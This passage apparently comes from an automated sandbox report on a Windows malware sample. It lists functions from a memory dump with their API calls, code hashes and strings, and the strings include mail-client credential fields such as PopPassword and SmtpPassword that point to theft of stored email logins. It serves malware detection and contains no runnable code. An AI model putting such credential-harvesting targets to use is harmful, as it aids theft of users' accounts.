                                                • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                • VariantInit.OLEAUT32(?), ref: 004043C4
                                                • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                • VariantInit.OLEAUT32(?), ref: 00404414
                                                • SysAllocString.OLEAUT32(?), ref: 00404419
                                                • VariantInit.OLEAUT32(?), ref: 00404431
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                • String ID:
                                                • API String ID: 1312198159-0
                                                • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                                • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                                • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                • API String ID: 0-2111798378
                                                • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402B7C Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recv
                                                • String ID:
                                                • API String ID: 1507349165-0
                                                • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040317B Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004061C3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _wmemset$ErrorLast
                                                • String ID: IDA$IDA
                                                • API String ID: 887189805-2020647798
                                                • Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                                • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                • Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                                • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                • socket.WS2_32(?,?,?), ref: 00404E7A
                                                • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: freeaddrinfogetaddrinfosocket
                                                • String ID:
                                                • API String ID: 2479546573-0
                                                • Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                                • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                • Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                                • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%